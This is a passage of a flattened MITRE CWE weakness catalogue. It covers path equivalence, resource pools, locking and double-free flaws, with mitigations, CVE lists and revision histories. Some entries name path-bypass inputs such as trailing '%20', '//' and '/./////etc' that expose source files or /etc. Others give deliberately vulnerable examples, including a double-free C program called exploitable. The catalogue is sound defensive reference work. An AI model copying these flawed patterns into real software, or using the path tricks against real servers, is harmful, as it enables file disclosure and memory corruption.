"red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2000-1114 - Source code disclosure using trailing dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1114 - - - CVE-2002-1986 - Source code disclosure using trailing dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1986 - - - CVE-2004-2213 - Source code disclosure using trailing dot or trailing encoding space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213 - - - CVE-2005-3293 - Source code disclosure using trailing dot - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293 - - - CVE-2004-0061 - Bypass directory access restrictions using trailing dot in URL - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0061 - - - CVE-2000-1133 - Bypass directory access restrictions using trailing dot in URL - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1133 - - - CVE-2001-1386 - Bypass check for ".lnk" extension using ".lnk." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386 - - - CVE-2001-0693 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693 - - - CVE-2001-0778 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778 - - - CVE-2001-1248 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1248 - - - CVE-2004-0280 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280 - - - CVE-2005-0622 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0622 - - - CVE-2005-1656 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1656 - - - CVE-2002-1603 - Source disclosure via trailing encoded space "%20" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603 - - - CVE-2001-0054 - Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as "%20"; certain manipulations have unusual side effects. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054 - - - CVE-2002-1451 - Trailing space ("+" in query string) leads to source code disclosure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1451 - - - CVE-2000-0293 - Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293 - - - CVE-2001-1567 - "+" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1567 - - - CVE-2002-0253 - Overlaps infoleak - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0253 - - - CVE-2001-0446 - Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0446 - - - CVE-2004-0334 - Bypass Basic Authentication for files using trailing "/" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0334 - - - CVE-2001-0893 - Read sensitive files with trailing "/" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0893 - - - CVE-2001-0892 - Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0892 - - - CVE-2004-1814 - Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1814 - - - BID:3518 - Source code disclosure - http://www.securityfocus.com/bid/3518 - - - CVE-2002-1483 - Read files with full pathname using multiple internal slash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483 - - - CVE-1999-1456 - Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1456 - - - CVE-2004-0578 - Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0578 - - - CVE-2002-0275 - Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0275 - - - CVE-2004-1032 - Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1032 - - - CVE-2002-1238 - Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1238 - - - CVE-2004-1878 - Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1878 - - - CVE-2005-1365 - Server allows remote attackers to execute arbitrary commands via a URL with multiple leading "/" (slash) characters and ".." sequences. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1365 - - - CVE-2000-1050 - Access directory using multiple leading slash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1050 - - - CVE-2001-1072 - Bypass access restrictions via multiple leading slash, which causes a regular expression to fail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072 - - - CVE-2004-0235 - Archive extracts to arbitrary files using multiple leading slash in filenames in the archive. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0235 - - - CVE-2002-1078 - Directory listings in web server using multiple trailing slash - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078 - - - CVE-2004-0847 - ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "\" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847 - - - CVE-2000-0004 - Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0004 - - - CVE-2002-0304 - Server allows remote attackers to read password-protected files via a /./ in the HTTP request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0304 - - - BID:6042 - Input Validation error - http://www.securityfocus.com/bid/6042 - - - CVE-1999-1083 - Possibly (could be a cleansing error) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1083 - - - CVE-2004-0815 - "/./////etc" cleansed to ".///etc" then "/etc" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815 - - - CVE-2002-0112 - Server allows remote attackers to view password protected files via /./ in the URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0112 - - - CVE-2004-0696 - List directories using desired path and "*" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0696 - - - CVE-2002-0433 - List files in web server using "*.ext" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433 - - - CVE-2001-1152 - Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1152 - - - CVE-2000-0191 - application check access for restricted URL before canonicalization - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191 - - - CVE-2005-1366 - CGI source disclosure using "dirname/../cgi-bin" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1366 - - - CVE-1999-0012 - Multiple web servers allow restriction bypass using 8.3 names instead of long names - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0012 - - - CVE-2001-0795 - Source code disclosure using 8.3 file name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795 - - - CVE-2005-0471 - Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0471 - - - - File or Directory - - - - Path Equivalence - - - FIO02-C - Canonicalize path names originating from untrusted sources - - - - - - - Some of these manipulations could be effective in path traversal issues, too. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes, Potential_Mitigations, Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Potential_Mitigations, Relationships - - Path Equivalence - Failure to Resolve Path Equivalence - - - - The software's resource pool is not large enough to handle peak demand, which allows an attacker to prevent others from accessing the resource by using a (relatively) large number of requests for resources. - Frequently the consequence is a "flood" of connection or sessions. - - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Availability - Integrity - Other - DoS: Crash, Exit, or Restart - Other - Floods often cause a crash or other problem besides denial of the resource itself; these are likely examples of *other* vulnerabilities, not an insufficient resource pool. - - - - - Architecture and Design - Do not perform resource-intensive transactions for unauthenticated users and/or invalid requests. - - - Architecture and Design - Consider implementing a velocity check mechanism which would detect abusive behavior. - - - Operation - Consider load balancing as an option to handle heavy loads. - - - Implementation - Make sure that resource handles are properly closed when no longer needed. - - - Architecture and Design - Identify the system's resource intensive operations and consider protecting them from abuse (e.g. malicious automated script which runs the resources out). - - - - - In the following snippet from a Tomcat configuration file, a JDBC connection pool is defined with a maximum of 5 simultaneous connections (with a 60 second timeout). In this case, it may be trivial for an attacker to instigate a denial of service (DoS) by using up all of the available connections in the pool. - - <Resource name="jdbc/exampledb"auth="Container"type="javax.sql.DataSource"removeAbandoned="true"removeAbandonedTimeout="30"maxActive="5"maxIdle="5"maxWait="60000"username="testuser"password="testpass"driverClassName="com.mysql.jdbc.Driver"url="jdbc:mysql://localhost/exampledb"/> - - - - - - CVE-1999-1363 - Large number of locks on file exhausts the pool and causes crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1363 - - - CVE-2001-1340 - Product supports only one connection and does not disconnect a user who does not provide credentials. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1340 - - - CVE-2002-0406 - Large number of connections without providing credentials allows connection exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0406 - - - - - Insufficient Resource Pool - - - A9 - Denial of Service - CWE More Specific - - - TPS00-J - Use thread pools to enable graceful degradation of service during traffic bursts - - - - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Functional_Areas, References - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control. - This prevents the software from acting on associated resources or performing other behaviors that are controlled by the presence of the lock. Relevant locks might include an exclusive lock or mutex, or modifying a shared resource that is treated as a lock. If the lock can be held for an indefinite period of time, then the denial of service could be permanent. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - DoS: Resource Consumption (Other) - When an attacker can control a lock, the program may wait indefinitely until the attacker releases the lock, causing a denial of service to other users of the program. This is especially problematic if there is a blocking operation on the lock. - - - - - White Box - Automated code analysis techniques might not be able to reliably detect this weakness, since the application's behavior and general security model dictate which resource locks are critical. Interpretation of the weakness might require knowledge of the environment, e.g. if the existence of a file is used as a lock, but the file is created in a world-writable directory. - - - - - Architecture and Design - Implementation - Use any access control that is offered by the functionality that is offering the lock. - - - Architecture and Design - Implementation - Use unpredictable names or identifiers for the locks. This might not always be possible or feasible. - - - Architecture and Design - Consider modifying your code to use non-blocking synchronization methods. - - - - - This code tries to obtain a lock for a file, then writes to it. - - function writeToLog($message){$logfile = fopen("logFile.log", "a"); - //attempt to get logfile lock - if (flock($logfile, LOCK_EX)) {fwrite($logfile,$message); - // unlock logfile - flock($logfile, LOCK_UN);}else {print "Could not obtain lock on logFile.log, message not recorded\n";}}fclose($logFile); - - PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock(). - - - - - CVE-2001-0682 - Program can not execute when attacker obtains a mutex. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0682 - - - CVE-2002-1914 - Program can not execute when attacker obtains a lock on a critical output file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1914 - - - CVE-2002-1915 - Program can not execute when attacker obtains a lock on a critical output file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1915 - - - CVE-2002-0051 - Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0051 - - - CVE-2000-0338 - Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0338 - - - CVE-2000-1198 - Chain: Lock files with predictable names. Resultant from randomness. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1198 - - - CVE-2002-1869 - Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1869 - - - - - Unrestricted Critical Resource Lock - - - Deadlock - - - A9 - Denial of Service - CWE More Specific - - - LCK00-J - Use private final lock objects to synchronize classes that may interact with untrusted code - - - LCK07-J - Avoid deadlock by requesting and releasing locks in the same order - - - SFP22 - Unrestricted lock - - - - - - - This overlaps Insufficient Resource Pool when the "pool" is of size 1. It can also be resultant from race conditions, although the timing window could be quite large in some cases. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Detection_Factors, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - KDM Analytics - 2009-07-17 - Critical - Suggested a better name and the minimal relationship with resources regardless of their criticality. - - - KDM Analytics - 2009-07-17 - Added a White_Box_Definition and clarified the consequences. - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences, Description, Name, Potential_Mitigations, White_Box_Definitions - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - KDM Analytics - 2008-08-29 - suggested clarification of description and observed examples, which were vague and inconsistent. - - Unrestricted Critical Resource Lock - Unrestricted Lock on Critical Resource - - - - The software does not lock or does not correctly lock a resource when the software must have exclusive access to the resource. - When a resource is not properly locked, an attacker could modify the resource while it is being operated on by the software. This might violate the software's assumption that the resource will not change, potentially leading to unexpected behaviors. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Availability - Modify Application Data - DoS: Instability - DoS: Crash, Exit, or Restart - - - - - Architecture and Design - Use a non-conflicting privilege scheme. - - - Architecture and Design - Implementation - Use synchronization when locking a resource. - - - - - The following function attempts to acquire a lock in order to perform operations on a shared resource. - - void f(pthread_mutex_t *mutex) { - pthread_mutex_lock(mutex); - - /* access shared resource */ - - - pthread_mutex_unlock(mutex); - } - - However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. - In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. - - int f(pthread_mutex_t *mutex) { - int result; - result = pthread_mutex_lock(mutex);if (0 != result)return result; - - - /* access shared resource */ - - - return pthread_mutex_unlock(mutex); - } - - - - This Java example shows a simple BankAccount class with deposit and withdraw methods. - - public class BankAccount { - - - // variable for bank account balance - private double accountBalance; - - // constructor for BankAccount - public BankAccount() {accountBalance = 0;} - - // method to deposit amount into BankAccount - public void deposit(double depositAmount) { - - double newBalance = accountBalance + depositAmount;accountBalance = newBalance; - } - - // method to withdraw amount from BankAccount - public void withdraw(double withdrawAmount) { - - double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance; - } - - // other methods for accessing the BankAccount object - ... - } - - However, the deposit and withdraw methods have shared access to the account balance private class variable. This can result in a race condition if multiple threads attempt to call the deposit and withdraw methods simultaneously where the account balance is modified by one thread before another thread has completed modifying the account balance. For example, if a thread attempts to withdraw funds using the withdraw method before another thread that is depositing funds using the deposit method completes the deposit then there may not be sufficient funds for the withdraw transaction. - To prevent multiple threads from having simultaneous access to the account balance variable the deposit and withdraw methods should be synchronized using the synchronized modifier. - - public class BankAccount { - ... - // synchronized method to deposit amount into BankAccount - public synchronized void deposit(double depositAmount) {...} - - // synchronized method to withdraw amount from BankAccount - public synchronized void withdraw(double withdrawAmount) {...} - ... - } - - An alternative solution is to use a lock object to ensure exclusive access to the bank account balance variable. As shown below, the deposit and withdraw methods use the lock object to set a lock to block access to the BankAccount object from other threads until the method has completed updating the bank account balance variable. - - public class BankAccount { - ... - // lock object for thread access to methods - private ReentrantLock balanceChangeLock; - - // condition object to temporarily release lock to other threads - private Condition sufficientFundsCondition; - - // method to deposit amount into BankAccount - public void deposit(double amount) { - - - // set lock to block access to BankAccount from other threads - balanceChangeLock.lock();try { - double newBalance = balance + amount;balance = newBalance; - - // inform other threads that funds are available - sufficientFundsCondition.signalAll(); - - } catch (Exception e) {...}finally {// unlock lock objectbalanceChangeLock.unlock();} - } - - // method to withdraw amount from bank account - public void withdraw(double amount) { - - - // set lock to block access to BankAccount from other threads - balanceChangeLock.lock();try { - while (balance < amount) { - - - // temporarily unblock access - - - // until sufficient funds are available - sufficientFundsCondition.await(); - }double newBalance = balance - amount;balance = newBalance; - - } catch (Exception e) {...}finally {// unlock lock objectbalanceChangeLock.unlock();} - }... - } - - - - - - Insufficient Resource Locking - - - VNA00-J - Ensure visibility when accessing shared primitive variables - - - VNA02-J - Ensure that compound operations on shared variables are atomic - - - LCK00-J - Use private final lock objects to synchronize classes that may interact with untrusted code - - - SFP19 - Missing Lock - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-09-27 - updated Description, Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - Martin Sebor - Cisco Systems, Inc. - 2010-04-30 - Provided Demonstrative Example - - Insufficient Resource Locking - - - - A product does not check to see if a lock is present before performing sensitive operations on a resource. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Availability - Modify Application Data - DoS: Instability - DoS: Crash, Exit, or Restart - - - - - Architecture and Design - Implementation - Implement a reliable lock mechanism. - - - - - CVE-2004-1056 - Product does not properly check if a lock is present, allowing other attackers to access functionality. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1056 - - - - - Missing Lock Check - - - SFP19 - Missing Lock - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - - - The product calls free() twice on the same memory address, potentially leading to modification of unexpected memory locations. - When a program calls free() twice with the same argument, the program's memory management data structures become corrupted. This corruption can cause the program to crash or, in some circumstances, cause two later calls to malloc() to return the same pointer. If malloc() returns the same value twice and the program later gives the attacker control over the data that is written into this doubly-allocated memory, the program becomes vulnerable to a buffer overflow attack. - - - - - - - - - - - - - - - - - Double-free - - - - - Architecture and Design - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Modify Memory - Execute Unauthorized Code or Commands - Doubly freeing memory may result in a write-what-where condition, allowing an attacker to execute arbitrary code. - - - - - Architecture and Design - Choose a language that provides automatic memory management. - - - Implementation - Ensure that each allocation is freed only once. After freeing a chunk, set the pointer to NULL to ensure the pointer cannot be freed again. In complicated error conditions, be sure that clean-up routines respect the state of allocation properly. If the language is object oriented, ensure that object destructors delete each chunk of memory only once. - - - Implementation - Use a static analysis tool to find double free instances. - - - - - The following code shows a simple example of a double free vulnerability. - - char* ptr = (char*)malloc (SIZE);...if (abrt) {free(ptr);}...free(ptr); - - Double free vulnerabilities have two common (and sometimes overlapping) causes: - - - - Error conditions and other exceptional circumstances - - - Confusion over which part of the program is responsible for freeing the memory - - - - Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once. - - - While contrived, this code should be exploitable on Linux distributions which do not ship with heap-chunk check summing turned on. - - #include <stdio.h>#include <unistd.h>#define BUFSIZE1 512#define BUFSIZE2 ((BUFSIZE1/2) - 8) - int main(int argc, char **argv) {char *buf1R1;char *buf2R1;char *buf1R2;buf1R1 = (char *) malloc(BUFSIZE2);buf2R1 = (char *) malloc(BUFSIZE2);free(buf1R1);free(buf2R1);buf1R2 = (char *) malloc(BUFSIZE1);strncpy(buf1R2, argv[1], BUFSIZE1-1);free(buf2R1);free(buf1R2);} - - - - - - CVE-2006-5051 - Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051 - - - CVE-2004-0642 - Double free resultant from certain error conditions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0642 - - - CVE-2004-0772 - Double free resultant from certain error conditions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0772 - - - CVE-2005-1689 - Double free resultant from certain error conditions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1689 - - - CVE-2003-0545 - Double free from invalid ASN.1 encoding. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0545 - - - CVE-2003-1048 - Double free from malformed GIF. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1048 - - - CVE-2005-0891 - Double free from malformed GIF. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0891 - - - CVE-2002-0059 - Double free from malformed compressed data. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0059 - - - - Memory - - - - DFREE - Double-Free Vulnerability - - - Double Free - - - Doubly freeing memory - - - MEM00-C - Allocate and free memory in the same module, at the same level of abstraction - - - MEM01-C - Store a new value in pointers immediately after free() - - - MEM30-C - Do not access freed memory - CWE More Specific - - - MEM31-C - Free dynamically allocated memory exactly once - - - SFP12 - Faulty Memory Release - - - - - - - - - This is usually resultant from another weakness, such as an unhandled error or race condition between threads. It could also be primary to weaknesses such as buffer overflows. - It could be argued that Double Free would be most appropriately located as a child of "Use after Free", but "Use" and "Release" are considered to be distinct operations within vulnerability theory, therefore this is more accurately "Release of a Resource after Expiration or Release", which doesn't exist yet. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Theoretical_Notes - - - - - Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. 